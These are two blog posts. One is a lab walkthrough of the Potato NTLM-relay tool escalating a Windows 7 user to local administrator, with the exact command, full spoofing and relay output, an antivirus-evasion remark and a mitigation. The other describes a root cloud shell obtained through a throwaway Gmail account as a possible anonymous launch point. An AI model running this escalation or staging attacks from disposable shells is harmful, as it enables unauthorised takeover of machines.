Discovered this little trick that will escalate a local user on a Windows box and give them local admin rights. The app is called Potato and its available at https://github.com/foxglovesec/Potato.
Just to see if this would really work, I setup a Windows 7 Enterprise VM. The first instance running a virus scanner (i.e., ESET) and the other running Symantec Endpoint Protection. Then I downloaded and decompressed the zip file. Neither "scanners" cared. Not necessarily exhaustive research, but as a form of stratified sampling, it will do.
So, the next logical step was to execute it. The GIT site does a great job of describing how it works and how to execute it.
From a terminal:
net localgroup administrators - to list who wasn't within the group and in this case "hacker"; then
ipconfig - to get the local IP address of the box, then I executed the following;
Potato.exe -ip 10.211.55.7 -disable_exhaust true -cmd "C:\\Windows\\System32\\cmd.exe /k net localgroup administrators hacker /add"
That resulted in the following output:
Starting NBNS spoofer...
Clearing dns and nbns cache...
Listening...
Got 127.0.0.1
Spoofed target WPAD succesfully...
Checking for windows defender updates...
Got Request: GET http://127.0.0.1/wpad.dat!
Spoofing wpad...
Got Request: GET http://127.0.0.1/wpad.dat!
Spoofing wpad...
Got Request: HEAD http://download.windowsupdate.comhttp//download.windowsupdate.
com/v9/windowsupdate/redir/muv4wuredir.cab?1602082135!
Redirecting to target..http://localhost/GETHASHES949255
Got Request: GET http://127.0.0.1/wpad.dat!
Spoofing wpad...
Got Request: HEAD http://localhost/GETHASHES949255!
Sending 401...
Got request for hashes...
Got Request: HEAD http://localhost/GETHASHES949255!
Sending 401...
Parsing initial NTLM auth...
NTLM TlRMTVNTUAABAAAAB7IIogkACQA3AAAADwAPACgAAAAGAbAdAAAAD1NFQUxNSU5EU0VUQzI3Q1d
PUktHUk9VUA==
Got Request: GET http://127.0.0.1/wpad.dat!
Spoofing wpad...
Setting up SMB relay...
initSecContext - State 0
initSecContext - State 1
Adding TlRMTVNTUAACAAAAHgAeADgAAAAFwoqiISJWymDPCzaAyKUBAAAAAJgAmABWAAAABgGwHQAAA
A9TAEUAQQBMAE0ASQBOAEQAUwBFAFQAQwAyADcAQwACAB4AUwBFAEEATABNAEkATgBEAFMARQBUAEMAM
gA3AEMAAQAeAFMARQBBAEwATQBJAE4ARABTAEUAVABDADIANwBDAAQAHgBTAEUAQQBMAE0ASQBOAEQAU
wBFAFQAQwAyADcAQwADAB4AUwBFAEEATABNAEkATgBEAFMARQBUAEMAMgA3AEMABwAIAMCeF5u4YtEBA
AAAAA== to queue
Got SMB challenge TlRMTVNTUAACAAAAHgAeADgAAAAFwoqiISJWymDPCzaAyKUBAAAAAJgAmABWAA
AABgGwHQAAAA9TAEUAQQBMAE0ASQBOAEQAUwBFAFQAQwAyADcAQwACAB4AUwBFAEEATABNAEkATgBEAF
MARQBUAEMAMgA3AEMAAQAeAFMARQBBAEwATQBJAE4ARABTAEUAVABDADIANwBDAAQAHgBTAEUAQQBMAE
0ASQBOAEQAUwBFAFQAQwAyADcAQwADAB4AUwBFAEEATABNAEkATgBEAFMARQBUAEMAMgA3AEMABwAIAM
CeF5u4YtEBAAAAAA==
Got Request: HEAD http://localhost/GETHASHES949255!
Sending 401...
Parsing final auth...
TlRMTVNTUAADAAAAAAAAAFgAAAAAAAAAWAAAAAAAAABYAAAAAAAAAFgAAAAAAAAAWAAAAAAAAABYAAAA
BcKIogYBsB0AAAAPQsdH2fWtywYPgDCuRqyEqA==
Got TlRMTVNTUAADAAAAAAAAAFgAAAAAAAAAWAAAAAAAAABYAAAAAAAAAFgAAAAAAAAAWAAAAAAAAABY
AAAABcKIogYBsB0AAAAPQsdH2fWtywYPgDCuRqyEqA==
Successfully started service
Got Request: HEAD http://download.windowsupdate.comhttp//download.windowsupdate.
com/v9/windowsupdate/redir/muv4wuredir.cab?1602082135!
Got Request: HEAD http://download.windowsupdate.comhttp//download.windowsupdate.
com/v9/windowsupdate/redir/muv4wuredir.cab?1602082135!
Got Request: HEAD http://download.windowsupdate.comhttp//download.windowsupdate.
com/v9/windowsupdate/redir/muv4wuredir.cab?1602082135!
Back to the prompt so I do another net localgroup administrators and check if the user hacker privileges where indeed escalated?
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
hacker
sealmindset
The command completed successfully.
It worked.
But as the author states on the site, you can actually prevent this by enabling Extended Protection for Authentication
Monday, February 8, 2016
Saturday, February 6, 2016
Free Shell
There are countless reasons for needing one, so if you need one Google delivers.
- Login into a gmail "throw away account"
- Goto https://console.developers.google.com
- Enable an API
- Create a project - You have to create it or the button won't appear to be active
- Click on the command icon
Bam! You got shell, and a simple sudo -s gets you root...
5 gigs worth of space running Debian 3.16. Now the question is, how much information leakage is there if you use this as a launch point...
Subscribe to:
Posts (Atom)